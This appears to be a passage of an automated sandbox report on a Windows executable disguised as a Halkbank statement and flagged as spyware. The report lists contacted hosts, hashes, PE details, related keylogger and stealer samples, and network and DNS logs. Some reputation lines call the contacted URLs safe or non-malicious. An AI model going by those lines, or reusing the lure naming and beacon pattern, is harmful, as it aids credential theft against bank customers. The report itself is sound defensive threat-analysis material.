                    https://reallyfreegeoip.org/xml/191.96.150.225$Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.org/xml/Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
104.21.27.85 | scratchdreams.tk | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1435266
                    Start date and time:2024-05-02 11:54:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Halkbank_Ekstre_20230426_075819_154055.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 156
                    • Number of non-executed functions: 14
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
11:54:51 | API Interceptor | 821567x Sleep call for process: Halkbank_Ekstre_20230426_075819_154055.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.177.134 | Payment_Advice.exe | malicious | Snake Keylogger |
172.67.177.134 | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger |
172.67.177.134 | Pnihosiyvr.exe | malicious | PureLog Stealer, Snake Keylogger |
172.67.177.134 | BmLue8t2V7.exe | malicious | Snake Keylogger |
172.67.177.134 | gZIZ5eyCtS.exe | malicious | Snake Keylogger |
172.67.177.134 | PsBygexGwH.exe | malicious | Snake Keylogger |
172.67.177.134 | Remittance_copy.pdf.scr.exe | malicious | Snake Keylogger |
172.67.177.134 | Purchase Order.exe | malicious | Snake Keylogger |
172.67.177.134 | Fuy2BDS9W2.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger |
172.67.177.134 | Purchase Order.exe | malicious | Snake Keylogger |
104.21.27.85 | DNXS-04-22.exe | malicious | PureLog Stealer, Snake Keylogger |
104.21.27.85 | PO 32187 #290424.exe | malicious | PureLog Stealer, Snake Keylogger |
104.21.27.85 | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger |
104.21.27.85 | e-dekont.exe | malicious | Snake Keylogger |
104.21.27.85 | PsBygexGwH.exe | malicious | Snake Keylogger |
104.21.27.85 | Zarefy4bOs.exe | malicious | Snake Keylogger |
104.21.27.85 | Remittance_copy.pdf.scr.exe | malicious | Snake Keylogger |
104.21.27.85 | Purchase Order.exe | malicious | Snake Keylogger |
104.21.27.85 | Fuy2BDS9W2.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger |
104.21.27.85 | Purchase Order.exe | malicious | Snake Keylogger |
132.226.247.73 | M0uVrW4HJb.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
132.226.247.73 | rSyDiExlek.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | sample1.exe | malicious | SeclesBot, TrojanRansom | checkip.dyndns.org/
132.226.247.73 | BmLue8t2V7.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | edlyEKgpaz.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Remittance_copy.pdf.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Fuy2BDS9W2.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Purchase Order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Purchase Order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | 8wvP84hzFu.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | PO_287104.exe | malicious | PureLog Stealer, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | DNXS-04-22.exe | malicious | PureLog Stealer, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | PO 32187 #290424.exe | malicious | PureLog Stealer, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Payment_Advice.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Payment_Advice.scr.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe | malicious | Unknown | 193.122.130.0
checkip.dyndns.com | SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe | malicious | Unknown | 193.122.6.168
checkip.dyndns.com | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | e-dekont.exe | malicious | Snake Keylogger | 158.101.44.242
scratchdreams.tk | DNXS-04-22.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.27.85
scratchdreams.tk | PO 32187 #290424.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.27.85
scratchdreams.tk | Payment_Advice.exe | malicious | Snake Keylogger | 172.67.169.18
scratchdreams.tk | Payment_Advice.scr.exe | malicious | Snake Keylogger | 172.67.169.18
scratchdreams.tk | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.169.18
scratchdreams.tk | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.27.85
scratchdreams.tk | e-dekont.exe | malicious | Snake Keylogger | 104.21.27.85
scratchdreams.tk | rSyDiExlek.exe | malicious | Snake Keylogger | 172.67.169.18
scratchdreams.tk | PsBygexGwH.exe | malicious | Snake Keylogger | 104.21.27.85
scratchdreams.tk | 58208 Teklif.exe | malicious | Snake Keylogger | 172.67.169.18
reallyfreegeoip.org | DNXS-04-22.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | PO 32187 #290424.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | Payment_Advice.exe | malicious | Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | Payment_Advice.scr.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | e-dekont.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | rSyDiExlek.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | Pnihosiyvr.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | BmLue8t2V7.exe | malicious | Snake Keylogger | 172.67.177.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | U8uFcjIjAR.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine | 104.21.76.57
CLOUDFLARENETUS | noa.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
CLOUDFLARENETUS | GX_MV Sunshine 07483032r_pdf.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | 04302024.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 104.21.91.69
CLOUDFLARENETUS | Setup (1).msi | malicious | Unknown | 172.67.132.219
CLOUDFLARENETUS | http://lib.xlsxpi.enoan2107.com:112 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | product.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | MOQ010524Purchase order.doc | malicious | FormBook | 104.21.74.191
CLOUDFLARENETUS | cXPFfk0pBp7bEsb.pif.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
UTMEMUS | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
UTMEMUS | sQSqM58mvl.elf | malicious | Mirai, Moobot, Okiru | 128.169.78.71
UTMEMUS | tajma.x86-20240421-1027.elf | malicious | Mirai, Okiru | 128.169.79.206
UTMEMUS | M0uVrW4HJb.exe | malicious | Agent Tesla, AgentTesla | 132.226.247.73
UTMEMUS | 74pdei4s1x.elf | malicious | Mirai | 132.192.1.144
UTMEMUS | rSyDiExlek.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | kGbjOmkleq.elf | malicious | Mirai | 132.226.89.207
UTMEMUS | BmLue8t2V7.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | edlyEKgpaz.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | VI3 Operation Guide_tech Info versionfdp.exe | malicious | Agent Tesla, AgentTesla | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | DNXS-04-22.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | PO 32187 #290424.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | G1lnGpOLK4.exe | malicious | Njrat | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe | malicious | Unknown | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe | malicious | Unknown | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | Payment_Advice.exe | malicious | Snake Keylogger | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | Payment_Advice.scr.exe | malicious | Snake Keylogger | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | 1nS3mkPS10.exe | malicious | LimeRAT | 172.67.177.134
54328bd36c14bd82ddaa0c04b25ed9ad | DEKONT.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e | noa.exe | malicious | AgentTesla, PureLog Stealer | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | GX_MV Sunshine 07483032r_pdf.exe | malicious | AgentTesla | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | JlvRdFpwOD.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | wmiclnt.dll | malicious | Unknown | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | setup.msi | malicious | Unknown | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | Setup (1).msi | malicious | Unknown | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | product.exe | malicious | AgentTesla | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | cXPFfk0pBp7bEsb.pif.exe | malicious | AgentTesla, PureLog Stealer | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | SOA.exe | malicious | AgentTesla, PureLog Stealer | 104.21.27.85
3b5074b1b5d032e5620f69f9f700ff0e | Dekontu.lnk.lnk | malicious | Unknown | 104.21.27.85
                                                            No context
                                                            Process:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.3360543528332585
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Halkbank_Ekstre_20230426_075819_154055.exe
                                                            File size:877'056 bytes
                                                            MD5:42199f4a8e3d9fe6ce26a7d4922afec7
                                                            SHA1:4e7547a14798f7c4520fab21ea2e34989bf27bc7
                                                            SHA256:9745e0d21f50b1c553b40e8c353b11bb172a2bae1a83b3b9cfce26f9e01b3b89
                                                            SHA512:3d4e92428c11f2c5df88550abae2ff0dc9dc74629b0d6943836445d594cfc2d856bd08e7c9ee51507bfd9d1a9909f97d1c21e1804637f4bacdc7bfe8d05491d2
                                                            SSDEEP:12288:xUE2iNdlONhj8Z/SMfIi6D0zgghZPebvoI9P2WcyHdSFYQ:V1PlONV8ZrfdKcovoWuWb95
                                                            TLSH:89154DD1F190CC9AED6B05F1AD2BA53014A3BE9D54A4810C569EBB1B76F3342209FE1F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p/...............0.................. ........@.. ....................................@................................
                                                            Icon Hash:aea4accc16a3d9be
                                                            Entrypoint:0x48f0b2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xF32F70C2 [Wed Apr 15 21:42:26 2099 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            xor byte ptr [eax], bh
                                                            xor al, 53h
                                                            cmp byte ptr [eax], bh
                                                            inc esi
                                                            dec eax
                                                            xor eax, 00000038h
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi+35h], cl
                                                            inc ebp
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [41464854h+esi], dh
                                                            dec eax
                                                            xor dh, byte ptr [eax+eax]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8f060 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x90000 | 0x48b00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xda000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d23c | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8d0e0 | 0x8d200 | 498d47208cef79fa1462fa54e058b724 | False | 0.9555123449955713 | OpenPGP Secret Key | 7.95952575244103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x90000 | 0x48b00 | 0x48c00 | 39000a27b6f101937faf6ae067616188 | False | 0.06334903887457044 | data | 4.769995776757593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xda000 | 0xc | 0x200 | a9a900f6c552168a2fb9d304e8077375 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x902e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.1798780487804878
RT_ICON | 0x90948 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2513440860215054
RT_ICON | 0x90c30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.3918918918918919
RT_ICON | 0x90d58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3200959488272921
RT_ICON | 0x91c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.33664259927797835
RT_ICON | 0x924a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.2622832369942196
RT_ICON | 0x92a10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.04393141403083114
RT_ICON | 0xd4a38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.18786307053941909
RT_ICON | 0xd6fe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.2453095684803002
RT_ICON | 0xd8088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3484042553191489
RT_GROUP_ICON | 0xd84f0 | 0x92 | data | | | 0.5753424657534246
RT_VERSION | 0xd8584 | 0x390 | data | | | 0.42214912280701755
RT_MANIFEST | 0xd8914 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            May 2, 2024 11:55:01.112905025 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:04.476000071 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:04.521708012 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:04.531945944 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.531975031 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.532028913 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.532582045 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.532596111 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.714554071 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.716202974 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.716228008 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942008018 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942107916 CEST44349721172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:04.942179918 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.942900896 CEST49721443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:04.947160006 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:04.947778940 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.146770000 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:05.146909952 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.148523092 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.148991108 CEST8049720132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:05.149069071 CEST4972080192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:05.345007896 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:11.466059923 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:11.467253923 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467291117 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.467353106 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467582941 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.467596054 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.520394087 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:11.649024010 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.692287922 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.708870888 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.708879948 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875636101 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875730038 CEST44349723172.67.177.134192.168.2.5
                                                            May 2, 2024 11:55:11.875777006 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.876225948 CEST49723443192.168.2.5172.67.177.134
                                                            May 2, 2024 11:55:11.962460995 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:12.066484928 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.066507101 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.066572905 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.073910952 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.073926926 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.199290991 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:12.207757950 CEST8049722132.226.247.73192.168.2.5
                                                            May 2, 2024 11:55:12.207818031 CEST4972280192.168.2.5132.226.247.73
                                                            May 2, 2024 11:55:12.261317015 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.261429071 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.272430897 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.272448063 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.272689104 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:12.278451920 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:12.324122906 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610687017 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610754013 CEST44349726104.21.27.85192.168.2.5
                                                            May 2, 2024 11:55:47.610830069 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:55:47.651453018 CEST49726443192.168.2.5104.21.27.85
                                                            May 2, 2024 11:56:01.935303926 CEST8049710132.226.247.73192.168.2.5
                                                            May 2, 2024 11:56:01.935390949 CEST4971080192.168.2.5132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 11:54:52.996556997 CEST | 50112 | 53 | 192.168.2.5 | 1.1.1.1
May 2, 2024 11:54:53.084842920 CEST | 53 | 50112 | 1.1.1.1 | 192.168.2.5
May 2, 2024 11:54:55.173474073 CEST | 54142 | 53 | 192.168.2.5 | 1.1.1.1
May 2, 2024 11:54:55.261873960 CEST | 53 | 54142 | 1.1.1.1 | 192.168.2.5
May 2, 2024 11:55:11.961673021 CEST | 51157 | 53 | 192.168.2.5 | 1.1.1.1
May 2, 2024 11:55:12.053781033 CEST | 53 | 51157 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 11:54:52.996556997 CEST | 192.168.2.5 | 1.1.1.1 | 0xff48 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:55.173474073 CEST | 192.168.2.5 | 1.1.1.1 | 0x8b83 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
May 2, 2024 11:55:11.961673021 CEST | 192.168.2.5 | 1.1.1.1 | 0x1e7e | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
